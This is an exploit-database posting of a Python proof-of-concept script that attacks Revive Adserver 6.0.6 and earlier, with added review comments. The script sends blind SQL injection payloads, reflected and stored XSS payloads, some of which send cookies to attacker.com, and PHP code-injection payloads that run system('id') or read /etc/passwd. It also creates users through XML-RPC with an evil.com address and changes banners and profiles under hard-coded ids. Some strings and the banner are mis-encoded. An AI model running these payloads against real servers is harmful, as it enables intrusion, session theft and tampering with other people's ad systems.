## https://sploitus.com/exploit?id=PACKETSTORM:222880
==================================================================================================================================
| # Title : Revive Adserver ≤ 6.0.6 Multi-Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.revive-adserver.com/ |
==================================================================================================================================
[+] Summary : This Python framework is designed to assess and attempt exploitation of multiple reported vulnerabilities in a Revive Adserver deployment.
It supports target discovery, optional authentication, and testing across several vulnerability categories.
[+] POC :
#!/usr/bin/env python3
import requests
import sys
import argparse
import time
import re
from urllib.parse import urljoin, quote
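class ReviveExploit:
    """Run the PoC's checks against one Revive Adserver base URL.

    Every ``exploit_*`` method sends its requests and prints what it saw;
    no result is stored on the instance, so ``generate_report`` prints the
    same text whatever the checks found.

    ``revive_path`` is set only by a successful ``find_revive_path``.  Every
    method that builds a URL reads it and raises ``AttributeError`` if
    discovery has not succeeded first.

    Several checks POST to admin pages with hard-coded object ids
    (``bannerid``, ``campaignid``, ``userid``, ``zoneid``); those requests
    are state-changing if the server accepts them.

    NOTE(review): the CVE identifiers in the method docstrings are the ones
    given by the PoC author; confirm them against the vendor advisory.
    """

    def __init__(self, target, username=None, password=None):
        """Store the target base URL and the optional credentials.

        A trailing slash on *target* is stripped so paths can be appended.
        """
        self.target = target.rstrip('/')
        self.session = requests.Session()
        self.username = username
        self.password = password
        # Filled by login(); stays empty when no login took place.
        self.cookies = {}
        # Install prefixes tried, in this order, by find_revive_path().
        self.base_paths = ['', '/revive-adserver', '/www', '/adserver', '/revive']

    def find_revive_path(self):
        """Probe the candidate prefixes and remember the first one that matches.

        Returns True and sets ``self.revive_path`` on the first response whose
        body contains one of the marker strings, otherwise returns False.
        """
        for path in self.base_paths:
            test_urls = [
                urljoin(self.target, f"{path}/www/index.php"),
                urljoin(self.target, f"{path}/index.php"),
                urljoin(self.target, f"{path}/delivery/zone-include.php")
            ]
            for url in test_urls:
                try:
                    resp = self.session.get(url, timeout=5)
                    # Loose fingerprint: any body that mentions "adserver"
                    # matches, so a hit proves neither product nor version.
                    if "Revive Adserver" in resp.text or "zone-include" in resp.text or "adserver" in resp.text:
                        # Literal restored from the page's mis-encoded Arabic
                        # text ("Revive Adserver found at").
                        print(f"[+] تم العثور على Revive Adserver في: {url}")
                        self.revive_path = path
                        return True
                except requests.RequestException:
                    # Candidate unreachable: move on to the next URL.  Unlike
                    # a bare except, Ctrl-C still interrupts the scan.
                    continue
        print("[-] No results found Revive Adserver")
        return False

    def login(self):
        """Log in with the supplied credentials (regular/Advertiser user).

        Returns True when the response is a 302 and a session cookie is
        present, False on missing credentials, failure or any exception.
        """
        if not self.username or not self.password:
            print("[!] Username and password not provided")
            return False
        login_url = urljoin(self.target, f"{self.revive_path}/www/admin/index.php")
        data = {
            'username': self.username,
            'password': self.password,
            'submit': 'Login'
        }
        try:
            # No timeout is set on this request.
            resp = self.session.post(login_url, data=data, allow_redirects=False)
            # Success is inferred from the redirect plus a cookie; the page
            # behind the redirect is never fetched to confirm it.
            if resp.status_code == 302 and ('PHPSESSID' in self.session.cookies or 'session' in resp.headers.get('Set-Cookie', '')):
                print(f"[+] You have logged in as: {self.username}")
                self.cookies = dict(self.session.cookies)
                return True
            else:
                print("[-] login failed")
                return False
        except Exception as e:
            print(f"[-] mistake: {e}")
            return False

    def exploit_sqli_blind(self):
        """CVE-2026-34914: Blind SQL Injection in zone-include.php.

        Sends each payload in the ``clientid`` query parameter of
        ``delivery/zone-include.php`` and prints a message when the response
        is slow or contains a MySQL error string.
        """
        print("\n[+] a test Blind SQL Injection (CVE-2026-34914)...")
        # For defenders: these probes put SQL keywords (SLEEP, BENCHMARK,
        # UNION SELECT) and quote characters in the clientid parameter, which
        # is visible in web-server access logs.
        payloads = [
            "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a) -- -",
            "1' AND (SELECT BENCHMARK(5000000,MD5('test'))) -- -",
            "1' AND (SELECT 1 FROM users WHERE id=1)='1' -- -",
            "-1' UNION SELECT version(),user(),database() -- -"
        ]
        inject_url = urljoin(self.target, f"{self.revive_path}/delivery/zone-include.php")
        for payload in payloads:
            start_time = time.time()
            params = {'clientid': payload, 'zoneid': '1'}
            try:
                resp = self.session.get(inject_url, params=params, timeout=10)
                elapsed = time.time() - start_time
                # No baseline request is timed, so a server that is simply
                # slow also crosses this threshold (false positive).
                if elapsed >= 4:
                    print(f"[!] SQL Injection may be present! Response time: {elapsed:.2f} seconds")
                    print(f" Load: {payload}")
                if "SQL syntax" in resp.text or "mysql_fetch" in resp.text:
                    print(f"[!] SQL error displayed! Payload: {payload}")
                    print(f" The truncated reply: {resp.text[:200]}")
            except requests.Timeout:
                print(f"[!] The halt in demand is an indicator of SQL Injection (Time-based): {payload}")
            except requests.RequestException:
                # Other transport errors are ignored for this payload.
                pass

    def exploit_reflected_xss(self):
        """CVE-2026-34915: Reflected XSS in zone-include.php.

        Reports a payload when it appears verbatim in the response body.
        """
        print("\n[+] Reflected XSS (CVE-2026-34915)...")
        xss_payloads = [
            '"><script>alert("XSS")</script>',
            '"><img src=x onerror=alert(document.cookie)>',
            "'><svg/onload=alert('XSS')>",
            '"><script>fetch("http://attacker.com/steal?c="+document.cookie)</script>',
            'javascript:alert("XSS")'
        ]
        inject_url = urljoin(self.target, f"{self.revive_path}/delivery/zone-include.php")
        for payload in xss_payloads:
            params = {'clientid': payload, 'zoneid': '1'}
            try:
                resp = self.session.get(inject_url, params=params)
                # The replace() call swaps a character for itself, so the
                # test reduces to "payload is a substring of the body".  The
                # response's content type and the surrounding markup are not
                # inspected, so a hit shows reflection, not script execution.
                if payload.replace('"', '"') != resp.text and payload in resp.text:
                    print(f"[!] Reflected XSS Possible! Load: {payload}")
                    print(f"The load appears in the response without filtering.")
            except requests.RequestException:
                pass

    def exploit_rce_delivery_limitations(self):
        """CVE-2026-34916 & CVE-2026-44959: RCE via delivery limitations.

        POSTs each payload as a delivery-limitation field to the banner and
        campaign edit pages and prints a message when the response text
        contains "saved" or "success".
        """
        print("\n[+] a test Remote Code Execution (CVE-2026-34916 & CVE-2026-44959)...")
        rce_payloads = [
            "'; system('id'); //",
            "'; phpinfo(); //",
            "'; echo file_get_contents('/etc/passwd'); //",
            "campaignDelimiterComponent}}]; system('id'); /*",
            "}}]; phpinfo(); /*"
        ]
        edit_urls = [
            urljoin(self.target, f"{self.revive_path}/www/admin/banner-edit.php"),
            urljoin(self.target, f"{self.revive_path}/www/admin/campaign-edit.php")
        ]
        for edit_url in edit_urls:
            for payload in rce_payloads:
                # State-changing request against hard-coded ids 1/1.
                data = {
                    'submit': 'Save',
                    'bannerid': '1',
                    'campaignid': '1',
                    'limitations[0][logical]': payload,
                    'limitations[0][component]': 'deliveryLimitations'
                }
                try:
                    resp = self.session.post(edit_url, data=data, cookies=self.cookies)
                    # The words "saved"/"success" anywhere in the page count
                    # as a hit; command output is never looked for, so this
                    # does not demonstrate code execution.
                    if "saved" in resp.text.lower() or "success" in resp.text.lower():
                        # Literal restored from the page's mis-encoded Arabic
                        # text ("payload saved, RCE may be possible").
                        print(f"[!] تم حفظ الحمولة! قد يكون RCE ممكناً: {payload}")
                        print(f" URL: {edit_url}")
                except requests.RequestException:
                    pass

    def exploit_stored_xss_fullname(self):
        """CVE-2026-44956: Stored XSS via the full-name profile field.

        POSTs a script payload as ``full_name`` for ``userid`` 1 and prints a
        message when the response contains "saved".
        """
        print("\n[+] Stored XSS (CVE-2026-44956) - full name...")
        xss_payload = '<script>new Image().src="http://attacker.com/steal?c="+document.cookie</script>'
        profile_url = urljoin(self.target, f"{self.revive_path}/www/admin/user-edit.php")
        # State-changing: rewrites the profile fields of the hard-coded
        # userid 1, including its e-mail address.
        data = {
            'submit': 'Save',
            'userid': '1',
            'full_name': xss_payload,
            'email': 'test@example.com',
            'username': self.username
        }
        try:
            resp = self.session.post(profile_url, data=data, cookies=self.cookies)
            # Only the save is checked; the page the message names
            # (userlog-details.php) is never requested to confirm rendering.
            if "saved" in resp.text.lower():
                print(f"[!] XSS has been stored in full name! Payload: {xss_payload}")
                print("The execution will take place when the manager watches. userlog-details.php")
        except Exception as e:
            print(f"[-] mistake: {e}")

    def exploit_xmlrpc_session_reuse(self):
        """CVE-2026-34917: web session id accepted by the XML-RPC API.

        Calls ``ox.getAdvertiserList`` with the PHPSESSID captured by
        ``login`` as the session argument; an empty string is sent when no
        login happened.
        """
        print("\n[+] Improper Authentication - Session Reuse (CVE-2026-34917)...")
        xmlrpc_url = urljoin(self.target, f"{self.revive_path}/www/api/xmlrpc/index.php")
        xml_payload = '''<?xml version="1.0"?>
<methodCall>
<methodName>ox.getAdvertiserList</methodName>
<params>
<param><value><string>{session_id}</string></value></param>
<param><value><string></string></value></param>
</params>
</methodCall>'''.format(session_id=self.cookies.get('PHPSESSID', ''))
        try:
            resp = self.session.post(xmlrpc_url, data=xml_payload,
                                     headers={'Content-Type': 'text/xml'})
            # Substring heuristic: no fault and a <struct> somewhere in the
            # reply; the returned data is not parsed.
            if "faultCode" not in resp.text and "struct" in resp.text:
                print("[!] The session can be reused to access the manager's API.!")
                print(f"Reply: {resp.text[:200]}")
        except requests.RequestException:
            pass

    def exploit_username_xss_bypass(self):
        """CVE-2026-44961: username validation bypass through XML-RPC.

        Calls ``ox.addUser`` once per test username and prints a message when
        the reply has no fault and contains "boolean".
        """
        print("\n[+] Incomplete Disallowed Inputs (CVE-2026-44961)...")
        xmlrpc_url = urljoin(self.target, f"{self.revive_path}/www/api/xmlrpc/index.php")
        malicious_usernames = [
            '<script>alert("XSS")</script>',
            'admin_hacker"><img src=x onerror=alert(1)>',
            '../../../../etc/passwd'
        ]
        for bad_user in malicious_usernames:
            # The session argument is the fixed text "admin_session", not a
            # value obtained from login().  For defenders: ox.addUser calls
            # on the XML-RPC endpoint are the artefact this check leaves.
            xml_payload = f'''<?xml version="1.0"?>
<methodCall>
<methodName>ox.addUser</methodName>
<params>
<param><value><string>admin_session</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><struct>
<member><name>username</name><value><string>{bad_user}</string></value></member>
<member><name>password</name><value><string>hacked123</string></value></member>
<member><name>email</name><value><string>hacker@evil.com</string></value></member>
</struct></value></param>
</params>
</methodCall>'''
            try:
                resp = self.session.post(xmlrpc_url, data=xml_payload,
                                         headers={'Content-Type': 'text/xml'})
                if "faultCode" not in resp.text and "boolean" in resp.text:
                    print(f"[!] Verification was bypassed and a username was created.: {bad_user}")
            except requests.RequestException:
                pass

    def exploit_improper_access_control(self):
        """CVE-2026-34912, CVE-2026-34913, CVE-2026-44958: missing ownership checks.

        Tries to link banner 1 to zone 2, then to disable banner 3, using the
        logged-in user's cookies.
        """
        # Literal restored from the page's mis-encoded Arabic word ("test").
        print("\n[+] اختبار Improper Access Control - Linking/Modifying without authorization...")
        zone_include_url = urljoin(self.target, f"{self.revive_path}/www/admin/zone-include.php")
        # The ids are hard-coded; the code never establishes who owns them,
        # so the "does not own it" wording in the message is an assumption.
        data = {
            'submit': 'Save',
            'zoneid': '2',
            'bannerid': '1'
        }
        try:
            resp = self.session.post(zone_include_url, data=data, cookies=self.cookies)
            if "success" in resp.text.lower() or "linked" in resp.text.lower():
                print("[!] It was linked banner by zone The user does not own it - violation of rights!")
        except requests.RequestException:
            pass
        banner_edit_url = urljoin(self.target, f"{self.revive_path}/www/admin/banner-edit.php")
        disable_data = {
            'submit': 'Save',
            'bannerid': '3',
            'status': '0'
        }
        try:
            resp = self.session.post(banner_edit_url, data=disable_data, cookies=self.cookies)
            if "success" in resp.text.lower():
                print("[!] Disabled banner without validity (CVE-2026-44958)!")
        except requests.RequestException:
            pass

    def generate_report(self):
        """Print the target details and a fixed list of recommendations.

        The output does not depend on what the checks found: no check stores
        a result, and the recommendations are constant strings.
        """
        print("\n" + "="*60)
        print("Test Report Revive Adserver")
        print("="*60)
        print(f"the goal: {self.target}")
        print(f"user: {self.username}")
        print(f"Installation path: {getattr(self, 'revive_path', 'unavailable')}")
        print("\nRecommendations:")
        print("1. Update Revive Adserver to version 6.0.7 or later")
        print("2. Change all passwords immediately")
        print("3. Check for unauthorized files or users")
        print("4. Disable the XML-RPC API if not necessary.")
        print("5. Review system logs for suspicious activity")
        print("="*60)

    def run_all(self):
        """Run discovery, the optional login, every check, then the report.

        Stops immediately when no installation path is found.
        """
        if not self.find_revive_path():
            return
        if self.username and self.password:
            if not self.login():
                print("[!] Continue without logging in...")
        self.exploit_sqli_blind()
        self.exploit_reflected_xss()
        self.exploit_rce_delivery_limitations()
        self.exploit_stored_xss_fullname()
        self.exploit_xmlrpc_session_reuse()
        self.exploit_username_xss_bypass()
        self.exploit_improper_access_control()
        self.generate_report()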
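def main():
    """Parse the command line and run the selected group of checks.

    For every action other than ``all`` (which performs its own discovery in
    ``run_all``) and ``report``, nothing is sent when discovery fails.  This
    matches ``run_all`` and avoids the ``AttributeError`` the checks raise
    when ``revive_path`` was never set.
    """
    parser = argparse.ArgumentParser(description='Revive Adserver <= 6.0.6 Multi-Exploit PoC')
    # Help text fixed: the original had an unbalanced parenthesis.
    parser.add_argument('--target', required=True, help='Goal (example: https://example.com)')
    parser.add_argument('--username', help='regular username (Advertiser)')
    parser.add_argument('--password', help='password')
    parser.add_argument('--action', default='all',
                        choices=['all', 'sqli', 'xss', 'rce', 'iac', 'report'],
                        help='Test type')
    args = parser.parse_args()
    exploit = ReviveExploit(args.target, args.username, args.password)

    if args.action == 'all':
        exploit.run_all()
        return

    found = exploit.find_revive_path()

    if args.action == 'report':
        # The report falls back to "unavailable" for the path, so it is
        # printed whether or not discovery succeeded.
        exploit.generate_report()
        return

    if not found:
        # No installation identified: send no payloads to this host.
        return

    if args.action == 'sqli':
        exploit.exploit_sqli_blind()
    elif args.action == 'xss':
        # This action does not log in, although the stored-XSS check sends
        # the session cookies and the username.
        exploit.exploit_reflected_xss()
        exploit.exploit_stored_xss_fullname()
    elif args.action == 'rce':
        if args.username and args.password:
            exploit.login()
        exploit.exploit_rce_delivery_limitations()
    elif args.action == 'iac':
        if args.username and args.password:
            exploit.login()
        exploit.exploit_improper_access_control()
        exploit.exploit_xmlrpc_session_reuse()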
if __name__ == "__main__":
    # Script entry point: print the banner, then hand over to main().
    # NOTE(review): the banner's frame characters and its inner spacing were
    # damaged by a character-encoding error on this page; the literal is left
    # exactly as found.
    print("""
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Revive Adserver Exploit PoC - โ
โ SQLi, XSS, RCE, Access Control, Auth Bypass โ
โ Affected update: <= 6.0.6 โ
โ by indoushka โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
""")
    main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================